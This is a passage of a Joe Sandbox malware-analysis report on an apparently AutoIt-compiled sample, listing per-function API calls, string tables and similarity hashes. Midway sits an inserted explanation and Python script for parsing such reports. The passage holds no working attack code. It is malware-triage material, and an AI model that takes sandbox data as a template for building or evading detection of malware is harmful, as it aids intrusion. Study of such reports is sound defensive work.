                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 7072ce179a35dcc4f0b8faa502eee36d4600de7895a7cba93a8896c2c552f86d
                                                            • Instruction ID: b787f3e4b45f84b404a9ca7fe55dff5df9ab7d876aae5b95dcfcf3a99566fceb
                                                            • Opcode Fuzzy Hash: 7072ce179a35dcc4f0b8faa502eee36d4600de7895a7cba93a8896c2c552f86d
                                                            • Instruction Fuzzy Hash: 4141383110024A8BCF20EF54D966AFE3B64AF11705F290455FDA61B392DB30D91AEBB1
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D5755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00D57565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D57578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D57580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D5758B
                                                            • DeleteDC.GDI32(00000000), ref: 00D57594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00D5759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00D575B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D575BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: @U=u$static
                                                            • API String ID: 2559357485-3553413495
                                                            • Opcode ID: 540e82f36f77e8514e3c95d7012c30e3188360ee80057e9784f4985b0a4aba9f
                                                            • Instruction ID: 3b813c2218496eae8ca1178f0d7a46355add03555070a574731ce4214eaccf28
                                                            • Opcode Fuzzy Hash: 540e82f36f77e8514e3c95d7012c30e3188360ee80057e9784f4985b0a4aba9f
                                                            • Instruction Fuzzy Hash: 2B314772104214ABDF129F64EC08FDA3BA9EF09362F250225FE15EA2A0D731D815DBB4
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D0E2A0,00000010,?,Bad directive syntax error,00D5F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D2F7C2
                                                            • LoadStringW.USER32(00000000,?,00D0E2A0,00000010), ref: 00D2F7C9
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • _wprintf.LIBCMT ref: 00D2F7FC
                                                            • __swprintf.LIBCMT ref: 00D2F81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D2F88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: dd51f278cb0d7cf2e9321b38bbb31873a2e98b59b78e3c81c39b1815d595be88
                                                            • Instruction ID: c9c48e2c8d6a6403b32cf119547e76869c3ba5845fb210076ee6654ab719072d
                                                            • Opcode Fuzzy Hash: dd51f278cb0d7cf2e9321b38bbb31873a2e98b59b78e3c81c39b1815d595be88
                                                            • Instruction Fuzzy Hash: 7B214F3194021DBFCF11EF90CC5AEEEB739BF28301F040866F615661A1EA719618EB61
                                                            APIs
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                              • Part of subcall function 00CD7924: _memmove.LIBCMT ref: 00CD79AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D35330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D35346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D35357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D35369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D3537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: 2f0d9d9068adfc111b4618110199da906a9bed1c01c638be319af0904a9c0c8d
                                                            • Instruction ID: 1ed95badf685207f2726064943856d323b1ae440799884af9c2c085055b81b89
                                                            • Opcode Fuzzy Hash: 2f0d9d9068adfc111b4618110199da906a9bed1c01c638be319af0904a9c0c8d
                                                            • Instruction Fuzzy Hash: 2E118231A902297DD720B765DC5ADFFBB7CEBD5B40F80052AB901A21D1EEB04D09D6B0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: b40cf969be6ee0ccaf6b90185d3d46abe61407a4b2e8a69034f3f725b2433439
                                                            • Instruction ID: ea791a52c1d95a61267c4dba0d50c74f2bdc9c54434750c4ababecf9ab0a6007
                                                            • Opcode Fuzzy Hash: b40cf969be6ee0ccaf6b90185d3d46abe61407a4b2e8a69034f3f725b2433439
                                                            • Instruction Fuzzy Hash: 231127715002186FCB14AB309C46EEA7BBCEF02712F0441B6F945D61A1FF759981DAB1
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CoInitialize.OLE32(00000000), ref: 00D3D5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D3D67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00D3D691
                                                            • CoCreateInstance.OLE32(00D62D7C,00000000,00000001,00D88C1C,?), ref: 00D3D6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D3D74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 00D3D7A4
                                                            • _memset.LIBCMT ref: 00D3D7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00D3D81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D3D840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00D3D847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00D3D87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00D3D880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: b9aa05064545af6c05c4fc07842e758077fc2fe4a42698e39f29e42a38aa563c
                                                            • Instruction ID: 340df78ed2fcf01c1b9aa492394a9925df5bb5d2d7d981bf60c0f6036fcebe01
                                                            • Opcode Fuzzy Hash: b9aa05064545af6c05c4fc07842e758077fc2fe4a42698e39f29e42a38aa563c
                                                            • Instruction Fuzzy Hash: ECB1E975A00209AFDB04DFA4D885DAEBBB9EF48304F148469E919DB361DB30ED45DF60
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 00D2C283
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D2C2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 00D2C2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D2C364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00D2C372
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D2C3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00D2C3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D2C3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D2C3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: e4e420edb4abde3d096ccbc08bf79a6ea9914abd7db6d547fba9ff8668c4d9a2
                                                            • Instruction ID: d60fa7826970a9b412caf3f89ba33fc0c4b7eae06a97bd6bfea5cdb8ad681849
                                                            • Opcode Fuzzy Hash: e4e420edb4abde3d096ccbc08bf79a6ea9914abd7db6d547fba9ff8668c4d9a2
                                                            • Instruction Fuzzy Hash: D8514F71B10305AFDB18CFA9DD89AAEBBBAEB98711F14852DF915D7290D7709D008B20
                                                            APIs
                                                              • Part of subcall function 00CD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CD2036,?,00000000,?,?,?,?,00CD16CB,00000000,?), ref: 00CD1B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00CD20D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00CD216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00D0BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 00D0BD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: ea57d78daff417a4d83412cf561a0327a3bf7ca2fa2579628735b882feb86ae7
                                                            • Instruction ID: 207de0072afe826de424675451d85edcb66df818b2a97f3916e81f6502bbc2aa
                                                            • Opcode Fuzzy Hash: ea57d78daff417a4d83412cf561a0327a3bf7ca2fa2579628735b882feb86ae7
                                                            • Instruction Fuzzy Hash: 8A617D31104B00DFDB36AF15E948B29B7F1FB50322F14852BE6568A7A4C770AD91DB70
                                                            APIs
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • GetSysColor.USER32(0000000F), ref: 00CD21D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: bf5165d64c8ca8517ff648040a65f91f3bcef793e028628674eddebe3b12683d
                                                            • Instruction ID: 59f1f3e12b4c7f6e17e942aadb7955f3d023f06b4b0c21c616a3090e597a85c6
                                                            • Opcode Fuzzy Hash: bf5165d64c8ca8517ff648040a65f91f3bcef793e028628674eddebe3b12683d
                                                            • Instruction Fuzzy Hash: 08415E31104740ABDB255F28EC88BB93B65EB26332F184266FE658E3E5D7318D42DB61
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,00D5F910), ref: 00D3A90B
                                                            • GetDriveTypeW.KERNEL32(00000061,00D889A0,00000061), ref: 00D3A9D5
                                                            • _wcscpy.LIBCMT ref: 00D3A9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 0fdd49f5c5a8baa464818122078af99dda173ce8920c51dcf8f78a8b513cef86
                                                            • Instruction ID: bb63e14599a5c3ff6431cf894033d63fe6d2887cb2ec6bf34645c6ddeb059df6
                                                            • Opcode Fuzzy Hash: 0fdd49f5c5a8baa464818122078af99dda173ce8920c51dcf8f78a8b513cef86
                                                            • Instruction Fuzzy Hash: B3517D312183019FC700EF18C992AAFB7A5EF84744F95482EF5D5972A2DB31D909EB63
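The per-function blocks on this page (the APIs list with its call-site addresses, the Memory Dump Source, and the Similarity fields) are what an analyst pivots on when triaging a report like this one, and the "Part of subcall function" annotation matters: those calls belong to a callee, not to the function being described. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in the layout shown above into records, separates a function's own calls from subcall-attributed ones, maps a call-site address back to its function, and locates the AutoIt drive-type helper by its String ID table (all$cdrom$fixed$network$ramdisk$removable$unknown). The block layout and the sample text are assumptions constructed from this page's own lines; the function names are mine.

```python
"""Parse Joe Sandbox per-function blocks (APIs / Memory Dump Source / Similarity).
Added example, not part of the report. The block layout is assumed to be the one
shown on this page; SAMPLE below is constructed from two of the page's own blocks.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Matches "• GetDriveTypeW.KERNEL32(00000061,00D889A0,00000061), ref: 00D3A9D5" and the
# "• Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC" form.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                        # call-site address (hex in the report)
    via_subcall: str | None = None  # callee address when the call is attributed to a sub-function

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    source_file: str = ""
    similarity: dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...

    @property
    def strings(self) -> list[str]:
        """The '$'-separated String ID table, e.g. ['all', 'cdrom', 'fixed', ...]."""
        raw = self.similarity.get("String ID", "")
        return raw.split("$") if raw else []

def parse_report(text: str) -> list[FunctionRecord]:
    """Every 'APIs' header opens a new function record; later sections fill it in."""
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
            continue
        if not records or not line:
            continue
        rec = records[-1]
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["caller"]))
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            rec.similarity[m["key"]] = m["value"]
        elif section == "Memory Dump Source" and line.startswith("• Source File:"):
            rec.source_file = line.split(":", 1)[1].split(",")[0].strip()
    return records

def direct_calls(rec: FunctionRecord) -> list[ApiCall]:
    """Calls made by the function itself, excluding those attributed to a callee."""
    return [c for c in rec.apis if c.via_subcall is None]

def address_span(rec: FunctionRecord) -> tuple[int, int] | None:
    """Lowest and highest direct call site: a rough locator for the function body."""
    refs = [c.ref for c in direct_calls(rec)]
    return (min(refs), max(refs)) if refs else None

def record_for_address(records: list[FunctionRecord], addr: int) -> FunctionRecord | None:
    """Map a call-site address (e.g. from a stack trace) back to its function record."""
    return next((r for r in records if any(c.ref == addr for c in direct_calls(r))), None)

def find_by_strings(records: list[FunctionRecord], needles: set[str]) -> list[FunctionRecord]:
    """Records whose String ID table contains every needle, e.g. the AutoIt drive-type names."""
    return [r for r in records if needles <= set(r.strings)]

# Constructed sample: two blocks copied from this report, whitespace as the page shows it.
SAMPLE = """\
APIs
  • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
• GetSysColor.USER32(0000000F), ref: 00CD21D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
• CharLowerBuffW.USER32(?,?,00D5F910), ref: 00D3A90B
• GetDriveTypeW.KERNEL32(00000061,00D889A0,00000061), ref: 00D3A9D5
• _wcscpy.LIBCMT ref: 00D3A9FF
Memory Dump Source
• Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
"""
```

Running `parse_report(SAMPLE)` yields two records; `find_by_strings(records, {"cdrom", "ramdisk"})` returns only the second, and `record_for_address(records, 0x00CD25EC)` returns nothing because that call site sits inside the callee at 00CD25DB rather than in the described function. The Opcode ID and fuzzy-hash fields are carried through in `similarity` so records can be compared across reports; the algorithms behind Joe Sandbox's API String IDs and fuzzy hashes are not reproduced here, the values are only parsed.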
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D586FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID: @U=u
                                                            • API String ID: 634782764-2594219639
                                                            • Opcode ID: 9317409bf4cc9ad44db51a09027087ef5ffadb23fd1141907be9eefd39f34ad8
                                                            • Instruction ID: c46975ebada0032d288e506bcfe9e98a49b473c2dafbdd5eb525026b7c7ce684
                                                            • Opcode Fuzzy Hash: 9317409bf4cc9ad44db51a09027087ef5ffadb23fd1141907be9eefd39f34ad8
                                                            • Instruction Fuzzy Hash: 6851A130500344BEEF209B25DC85FA97BA4EB09362F644116FD51F62A1CF71E988EB71
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0C370
                                                            • DestroyIcon.USER32(00000000), ref: 00D0C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0C39C
                                                            • DestroyIcon.USER32(?), ref: 00D0C3AB
                                                              • Part of subcall function 00D5A4AF: DeleteObject.GDI32(00000000), ref: 00D5A4E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID: @U=u
                                                            • API String ID: 2819616528-2594219639
                                                            • Opcode ID: 50a1201c0e3596ebba3ae6546ce85bcf9dcc79deee0169fed8e6611ea11e1bf0
                                                            • Instruction ID: 934495655263afd51eddd2e108a67e9988c52a6ce019a7adc3f5cc3035e3605c
                                                            • Opcode Fuzzy Hash: 50a1201c0e3596ebba3ae6546ce85bcf9dcc79deee0169fed8e6611ea11e1bf0
                                                            • Instruction Fuzzy Hash: 5E515970A20305AFDB20DF65DC45BAA7BA5EB58311F10462AFA16D73E0D7B0ED90DB60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: e259c6650259b750c2cd7b5d89f8809ca902ecfd693ddb8038564febe03579e9
